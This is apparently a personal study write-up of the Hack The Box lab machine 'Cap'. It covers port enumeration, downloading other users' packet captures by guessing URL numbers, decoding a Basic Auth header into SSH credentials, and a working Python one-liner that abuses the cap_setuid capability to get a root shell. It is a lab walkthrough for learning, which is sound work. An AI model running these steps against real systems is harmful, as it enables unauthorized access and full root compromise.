pentest.html – Pentest Notes

Date: 2025-12-02
Box: HTB – Cap (Pentest Study Note)

HTB Cap – Pentest Walkthrough Notes

1. Initial Enumeration

Full TCP scan with default scripts and version detection:

nmap -sC -sV -p- <IP>

Open ports discovered:

  • 22/tcp – SSH
  • 80/tcp – HTTP

2. Web Enumeration

The HTTP service exposes a capture interface that allows downloading PCAP files. By incrementing the numeric part of the URL, different captures can be retrieved:

http://<IP>/data/0
http://<IP>/data/1
http://<IP>/data/2

data/0 contained sensitive authentication data.

3. PCAP Analysis → Credential Extraction

After downloading data/0, inspecting it with Wireshark (or even just strings) revealed an HTTP Basic Authorization header:

Authorization: Basic bmF0aGFuOnNvbWVwYXNzd29yZA==

Decoded with base64:

echo bmF0aGFuOnNvbWVwYXNzd29yZA== | base64 -d
nathan:somepassword

This gives valid SSH credentials for user nathan.

4. Foothold – SSH User Shell

Use the extracted credentials to obtain a user shell:

ssh nathan@<IP>

Login succeeds and a standard user shell is obtained.

5. Privilege Escalation via Capabilities

Check Linux capabilities on the system:

getcap -r / 2>/dev/null

Relevant output:

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

Key points:

  • cap_setuid means this binary is allowed to call setuid() as root.
  • It does not mean that simply running python3.8 automatically gives a root shell.

6. Why the First Attempt Was Not Root

The initial attempt was:

/usr/bin/python3.8 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

This only replaces the current process image with /bin/sh, but never calls setuid(0). As a result, the shell still runs with user nathan's UID.

The capability gives “the power to become root” via setuid(0), but that function actually has to be called explicitly in the exploit.

7. Correct PrivEsc Exploit

Working exploit using the capability:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Now:

whoami
root

And finally:

cat /root/root.txt

8. OSCP-Style Key Takeaways

  • Enumeration: Guessable PCAP IDs in the web interface → information disclosure.
  • Credential Harvesting: Basic Auth credentials extracted from captured HTTP traffic.
  • Foothold: SSH access using the recovered nathan credentials.
  • PrivEsc Vector: Misconfigured Linux capabilities on /usr/bin/python3.8.
  • Exploit Detail: cap_setuid ≠ auto-root; you must explicitly call setuid(0) before spawning a shell.